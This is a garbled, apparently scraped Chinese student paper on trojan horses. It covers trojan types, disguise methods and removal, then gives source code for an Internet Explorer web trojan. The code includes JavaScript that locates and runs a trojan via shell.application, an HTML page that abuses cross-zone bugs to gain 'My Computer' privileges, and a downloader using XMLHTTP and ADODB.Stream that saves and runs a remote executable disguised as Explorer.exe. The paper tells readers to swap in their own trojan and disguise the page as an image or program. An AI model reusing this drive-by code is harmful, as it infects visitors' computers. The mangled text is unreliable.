信息安全論文

1、信息安全論文信息安全論文信息安全論文信息安全論文題目：木馬作者：蘆存博 20075401178 宋婷 20075401166 徐麗亞20075401186 王笑瑜20075401045摘要：木馬是特洛伊木馬的簡稱，是一種在遠(yuǎn)程計算機(jī)之間建立起連接，使遠(yuǎn)程計算機(jī)能通過網(wǎng)絡(luò)控制本地計算機(jī)上的程序。它冒名頂替，以人們所知曉的合法而正常的程序（如計算機(jī)游戲，壓縮工具乃至防治計算機(jī)病毒軟件等）面目出現(xiàn)，來達(dá)到欺騙欲獲得該合法程序的用戶將之在計算機(jī)上運(yùn)行，產(chǎn)生用戶所料不及的破壞后果之目的。通俗地講，木馬就是一種“掛羊頭，賣狗肉”的實(shí)施破壞作用的計算機(jī)程序。關(guān)鍵詞：類型；偽裝方式；查殺方法；源代碼；工作原理

2、；反查殺技術(shù)0 引言 從本質(zhì)上講，木馬程序?qū)儆谶h(yuǎn)程管理工具的范疇，如PCAnyWhere等，其目的在于通過網(wǎng)絡(luò)進(jìn)行遠(yuǎn)程管理控制。木馬和遠(yuǎn)程控制軟件的區(qū)別在于木馬具有隱蔽性，遠(yuǎn)程控制軟件的服務(wù)器端在目標(biāo)計算機(jī)上運(yùn)行時，目標(biāo)計算機(jī)會出現(xiàn)很醒目的標(biāo)志，而木馬類軟件的服務(wù)器端在運(yùn)行時則使用多種手段來隱藏自己。1,木馬的類型(1) 破壞型 這種木馬是很令人討厭的，這個病毒可以自動的刪除電腦上的重要文件，例如dLL、INI、EXE文件。(2) 密碼發(fā)送型 主要是用來盜竊用戶隱私信息的，他可以把隱藏的密碼找出來發(fā)送到指定的信箱。也可以用來盜竊用戶的敏感口令等。同時，此類病毒最重要的是會記錄操作者的鍵盤，找到

3、相關(guān)的有用的信息。(3) 遠(yuǎn)程訪問型 使用最多既木馬。入侵者運(yùn)行了客戶端，使用木馬者就可以通過遠(yuǎn)程連接到對方電腦，訪問對方電腦資源。(4) 鍵盤記錄木馬 這種鍵盤木馬一般都制作的很短小精悍，主要用來記錄中木馬者的鍵盤敲擊記錄，并且根據(jù)網(wǎng)絡(luò)訪問情況，給木馬使用者發(fā)送到指定的信箱等。(5) DOS攻擊型 DOS的全稱是洪水式服務(wù)攻擊。是用來請求服務(wù)器請求，讓服務(wù)器忙與處理應(yīng)答，而占用了大量的資源，最后服務(wù)器資源耗盡而死機(jī)。使用多臺電腦DOS攻擊取得的效果更好，可以用他來慢慢攻擊更多的電腦。(6) 代理木馬 可以把自己的電腦從其他地方代理，然后重新訪問網(wǎng)絡(luò)服務(wù)器，起一個中轉(zhuǎn)的作用。(7) FTP木馬

4、 FTP木馬容量也很小，一般情況下是用來打開21端口來等待用戶連接。(8) 程序殺手木馬 主要是用來關(guān)閉一些監(jiān)控軟件等，這樣就可以讓木馬更安全的保留在系統(tǒng)中，防止被監(jiān)控軟件發(fā)現(xiàn)，從而對用戶造成數(shù)據(jù)丟失，敏感信息泄露等故障。(9) 反彈端口型木馬反彈端口是為了躲避防火墻的過濾而制作的。因?yàn)榉阑饓B入的鏈接做一個很嚴(yán)格的過濾，對于連出的鏈接可能就不是那么嚴(yán)格了，所以利用這一點(diǎn)，把端口反彈，就可以更安全的使用了。2,木馬的偽裝方式（1）修改圖標(biāo)對木馬程序的圖標(biāo)進(jìn)行修改，從而偽裝成其他類型文件，以達(dá)到欺騙用戶的目的。現(xiàn)在有的木馬已經(jīng)可以將木馬服務(wù)器端程序的圖標(biāo)改成HTML,TXT,ZIP等各種文件

5、的圖標(biāo)，具有相當(dāng)大的迷惑性。（2）出錯顯示如果打開一個文件后沒有任何反應(yīng)，這很可能就是個木馬程序，木馬的設(shè)計者也意識到了這個缺陷，所以已經(jīng)有木馬提供了一個叫做出錯顯示的功能。當(dāng)服務(wù)器端用戶打開木馬程序時，會彈出一個錯誤提示框（當(dāng)然是假的），錯誤內(nèi)容可自由定義，大多會定制成一些諸如“文件已破壞，無法打開！”之類的信息，當(dāng)服務(wù)器端用戶信以為真時，木馬卻悄悄侵入了系統(tǒng)。( 3)定制端口很多老式的木馬端口都是固定的，這給判斷是否感染了木馬帶來了方便，只要查一下特定的端口就知道感染了什麼木馬，所以現(xiàn)在很多新式的木馬都加入了定制端口的功能，控制端用戶可以102465535之間任選一個端口作為木馬端口，這樣

6、就給判斷所感染的木馬類型帶來了麻煩(4)自我銷毀當(dāng)服務(wù)器端用戶打開含有木馬的文件后，木馬會將自己復(fù)制到windows的系統(tǒng)文件夾中。一般來說源木馬文件和系統(tǒng)文件夾中的木馬文件的大小是一樣的（捆綁文件的木馬除外），那么中了木馬的系統(tǒng)只要在近來收到的心間和下載的軟件中找到源木馬文件，然后根據(jù)源木馬的大小去系統(tǒng)文件夾中找到相同大小的文件，判斷一個哪個是木馬就行了。木馬的自我銷毀功能彌補(bǔ)了木馬的這一缺陷。當(dāng)安裝完木馬后，源木馬文件將自動銷毀，這樣服務(wù)器端用戶就很難找到木馬的來源，在沒有查殺木馬的工具幫助下，就很難刪除木馬了。（5）木馬更名安裝到系統(tǒng)文件夾中的木馬的文件名一般是固定的，那么只要根據(jù)一些查

7、殺木馬的文章，在系統(tǒng)文件夾中查找特定的文件，就可以斷定中了什么木馬。所以現(xiàn)在有很多木馬都允許控制端用戶自由定制安裝后的木馬文件名，這樣就很難判斷所感染的木馬類型了。(6)捆綁文件將木馬捆綁到一個安裝程序上，當(dāng)安裝程序運(yùn)行時，木馬在用戶毫無察覺的情況下，偷偷地進(jìn)入系統(tǒng)。也可以將木馬和一張圖片捆綁，當(dāng)用戶打開“圖片”時，木馬就在后臺不知不覺地運(yùn)行了。3,木馬的查殺方法木馬的清除方法，可以總結(jié)為監(jiān)視端口，監(jiān)視文件，監(jiān)視進(jìn)程，監(jiān)視進(jìn)程模塊和監(jiān)視注冊表，一旦發(fā)現(xiàn)木馬，然后采取相應(yīng)的清除措施。木馬的本質(zhì)是程序，必須運(yùn)行起來后才能工作，所以必定會在系統(tǒng)中留下一些蛛絲馬跡。下面針對一些常用木馬所慣用的伎倆來找

8、出躲在系統(tǒng)中的木馬。檢查是否存在陌生進(jìn)程，檢查注冊表，檢查開放的端口，使用冰刃進(jìn)行檢查，監(jiān)控注冊表的變化。通過以上方法，基本能確定系統(tǒng)中是否存在木馬。 手工清除木馬的步驟是：找到木馬文件，結(jié)束木馬進(jìn)程，刪除木馬文件進(jìn)行善后處理 當(dāng)然，木馬查找和清除的最好辦法還是借助于專門的軟件實(shí)現(xiàn)。專業(yè)的木馬清除工具有Trojan Hunter和AVG Anti-Spyware(Ewido)等4,木馬的源代碼及工作原理function icyfoxlovelace() /得到系統(tǒng)目錄和系統(tǒng)盤url=document.location.href;xtmu=url.substrin

9、g(6,url.indexOf('',9)+1)xtp=url.substr(6,3)var shell=new ActiveXObject("shell.application")var runbz=1;/此處設(shè)置木馬程序的大小，以字節(jié)為單位/請把198201改為你的木馬程序的實(shí)際大小var exeSize=198201;/設(shè)置木馬程序名及擴(kuò)展名(exe,com,bat,pif,scr&#4

10、1;，用于判斷是否是所下載的木馬程序/請把下面兩行中的icyfox改為你的木馬程序名，bat改為你的木馬程序的擴(kuò)展名var a=/icyfox[d*].bat/gi;pile("icyfox[d*].bat","gi")var b=/[A-Za-z]:/gi;pile("[A-Za-z]:&q

11、uot;,"gi")/正則表達(dá)式,用于判斷是否是盤的根目錄/下面的代碼查找并運(yùn)行木馬程序wjj(xtmu+"Temporary Internet Files")/Content.IE5if(runbz)wjj(xtp+"Documents and Settings")if(runbz)yp()/在所有硬盤分區(qū)下查找

12、并運(yùn)行木馬程序function yp() try var c=new Enumerator(space("c:").ParentFolder.Items())for (!c.atEnd()c.moveNext()) if(runbz) if(b.test&

13、amp;#40;c.item().path))wjj(c.item().path) else break;catch(e) /利用遞歸在指定目錄(包括子目錄)下查找并運(yùn)行木馬程序function wjj(b) try var c=new Enumerator(space(b).Items(&

14、amp;#41;)for (!c.atEnd()c.moveNext()) if(runbz&&c.item().Size=exeSize&&a.test(c.item().path)) var f=c.item().path;var v=f.lastIndexO

15、f('')+1;try space(f.substring(0,v)).items().item(f.substr(v)).invokeverb()/運(yùn)行木馬程序runbz=0;break; catch(e) if(!c.item().Size&#41

16、;wjj(c.item().path+"")/如果是子目錄則遞歸調(diào)用catch(e) icyfoxlovelace()請把以上代碼保存為icyfox.js。 接下來我們就要利用一個小小跨域執(zhí)行漏洞，來獲得"我的電腦"域的網(wǎng)頁權(quán)限，大家以前是不是和我一樣覺得這種漏洞僅僅只能用來進(jìn)行跨站腳本攻擊，得到COOKIE之類的東東呢？這次它終于可以露臉啦！代碼如下：<HTML>&a

17、mp;lt;HEAD><META http-equiv=Content-Type content="text/html; charset=gb2312"><TITLE>冰狐浪子網(wǎng)絡(luò)技術(shù)實(shí)驗(yàn)室的完美網(wǎng)頁木馬</TITLE></HEAD><BODY oncontextmenu="return false" onselectstart="return false&q

18、uot; scroll="no" topmargin="0" leftmargin="0"><SCRIPT LANGUAGE="icyfoxlovelace" src="http:/<SCRIPT LANGUAGE="JavaScript">/此處設(shè)置上面icyfox.js文件的網(wǎng)絡(luò)地址/請把http:/jsur

19、l="http:/WIE=navigator.appVersion;if(WIE.indexOf("MSIE 5.0")>-1) /*IE 5.0利用iframe標(biāo)簽,src屬性設(shè)為icyfox:/則會使此標(biāo)簽具備"我的電腦"域的權(quán)限,原因是因?yàn)閕cyfox:/是不存在的協(xié)議，所以會會利用res:/協(xié)議打開SHDOCLC.DLL中的語法錯誤頁syntax.htm，而

20、且SHDOCLC.DLL又位于系統(tǒng)目錄中，為在icyfox.js中得到系統(tǒng)目錄和系統(tǒng)盤提供數(shù)據(jù)；*/document.write("<iframe style='display:none;' name='icyfoxlovelace' src='icyfox:/'></iframe>")setTimeout("muma0()&a

21、mp;quot;,1000)else /*IE5.5、IE6.0則利用_search漏洞，把打開的地址設(shè)為icyfox:/，從而使_search搜索框具備"我的電腦"域的權(quán)限，因?yàn)樵贗E6.0中無法用上面的iframe漏洞，IE5.5應(yīng)該可以用，我沒有測試。這樣做的結(jié)果會打開搜索欄,有點(diǎn)遺憾！*/window.open("icyfox:/","_search")setTimeout(&

22、quot;muma1()",1000)/下面利用file:javascript:協(xié)議漏洞在已是我的電腦"域的權(quán)限的"icyfox:/"中插入icyfox.js腳本并運(yùn)行function muma0() window.open("file:javascript:document.all.tags('SCRIPT

23、')[0].src='"+jsurl+"'eval()","icyfoxlovelace")function muma1() window.open("file:javascript:document.all.tags('SCRIPT')&am

24、p;#91;0].src='"+jsurl+"'eval()","_search") </SCRIPT></BODY><NOSCRIPT><iframe style="display:none;" src='*.*'></iframe&

25、amp;gt;</NOSCRIPT></HTML>把上面的代碼保存為icyfox.htm,如果你愿意可以把擴(kuò)展名改為jpg并在網(wǎng)頁中加入一個精美的圖片背景，來做一個圖片木馬，甚至你可以改為exe，來冒充一個好的程序的下載地址，并在網(wǎng)頁的<HEAD></HEAD>中加入標(biāo)簽<metahttp-equiv="refresh" content="5;url='http:/ 如果你覺得win98沒必要

26、控制的話，還有更好的木馬等著你，不知大家是否用過win2000、winxp等系統(tǒng)中默認(rèn)安裝的ADODB.Stream及Microsoft.XMLHTTP控件？它們可是和shell.application控件一樣是經(jīng)過了安全認(rèn)證的，可以在"我的電腦"域中的網(wǎng)頁中暢通無阻執(zhí)行的好東西呀！請看下面的代碼：function icyfox() /設(shè)置下載后保存在系統(tǒng)目錄下的木馬程序名，我設(shè)的是不是很象Explorer.exe呀？呵呵var name="Explroer.exe"/設(shè)置你要下載的木馬程序

27、的地址（此處你可以把擴(kuò)展名任意改，甚至沒有擴(kuò)展名也可以的)/可以更好的躲過免費(fèi)主頁空間的上傳限制var url="http:/try var folder=document.location.href;folder=folder.substring(6,folder.indexOf('',9)+1)+name;var xml=new ActiveXObject("Microsoft.XMLHTTP"&#41

28、;xml.open("GET",url,false)xml.send()if(xml.status=200) var ado=new ActiveXObject("ADODB.Stream")ado.Type=1;ado.Open()ado.write(xml.responseBody)ado.SaveToFile(f

29、older,2)ado.Close()ado=null;xml=null;document.body.insertAdjacentHTML('AfterBegin','<OBJECT style="display:none;" TYPE="application/x-oleobject" CODEBASE="'+folder+'">&

30、lt;/OBJECT>')catch(e) icyfox()把上面的的代碼保存為icyfox.js替換上面保存的icyfox.js文件，同樣利用上面的icyfox.htm來注入到"我的電腦"域中，呵呵你就偷這樂吧！最后還請大家發(fā)揮以下DIY的能力把上面兩種代碼合二為一，我相信一個現(xiàn)階段最最完美的網(wǎng)頁木馬就會在你手中誕生啦！是不是神不知鬼不覺？提示代碼如下：try new ActiveXObject("ADODB.Stream

31、")icyfox() catch(e) icyfoxlovelace() 一般的木馬程序都包括客戶端和服務(wù)端兩個程序，其申客戶端是用于攻擊者遠(yuǎn)程控制植入木馬的機(jī)器，服務(wù)器端程序即是木馬程序。攻擊者要通過木馬攻擊你的系統(tǒng)，他所做的第一步是要把木馬的服務(wù)器端程序植人到你的電腦里面。目前木馬入侵的主要途徑還是先通過一定的方法把木馬執(zhí)行文件弄到被攻擊者的電腦系統(tǒng)里，利用的途徑有郵件附件、下載軟件中等，然后通過一定的提示故意誤導(dǎo)被攻擊者打開執(zhí)行文件，比如故意謊稱這個木馬執(zhí)行文

32、件，是你朋友送給你賀卡，可能你打開這個文件后，確實(shí)有賀卡的畫面出現(xiàn)，但這時可能木馬已經(jīng)悄悄在你的后臺運(yùn)行了。一般的木馬執(zhí)行文件非常小，大部分都是幾K到幾十K，如果把木馬捆綁到其他正常文件上，你很難發(fā)現(xiàn)，所以，有一些網(wǎng)站提供的軟件下載往往是捆綁了木馬文件的，你執(zhí)行這些下載的文件，也同時運(yùn)行了木馬。木馬也可以通過Script、ActiveX及Asp.CGI交互腳本的方式植入，由于微軟的瀏覽器在執(zhí)行Senipt腳本存在一些漏洞。攻擊者可以利用這些漏洞傳播病毒和木馬，甚至直接對瀏覽者電腦進(jìn)行文件操作等控制。前不久獻(xiàn)出現(xiàn)一個利用微軟Scripts腳本漏洞對瀏覽者硬盤進(jìn)行格式化的HTML頁面。如果攻擊者有

33、辦法把木馬執(zhí)行文件下載到攻擊主機(jī)的一個可執(zhí)行WWW目錄夾里面，他可以通過編制CGI程序在攻擊主機(jī)上執(zhí)行木馬目錄。此外，木馬還可以利用系統(tǒng)的一些漏洞進(jìn)行植人，如微軟著名的US服務(wù)器溢出漏洞，通過一個IISHACK攻擊程序即可使IIS服務(wù)器崩潰，并且同時攻擊服務(wù)器，執(zhí)行遠(yuǎn)程木馬執(zhí)行文件。當(dāng)服務(wù)端程序在被感染的機(jī)器上成功運(yùn)行以后，攻擊者就可以使用客戶端與服務(wù)端建立連接，并進(jìn)一步控制被感染的機(jī)器。在客戶端和服務(wù)端通信協(xié)議的選擇上，絕大多數(shù)木馬使用的是TCP/IP協(xié)議，但是也有一些木馬由于特殊的原因，使用UDP協(xié)議進(jìn)行通訊。當(dāng)服務(wù)端在被感染機(jī)器上運(yùn)行以后，它一方面盡量把自己隱藏在計算機(jī)的某個角落里面，以防被用戶發(fā)現(xiàn);同時監(jiān)聽某個特定的端口，等待客戶端與其取得連接;另外為了下次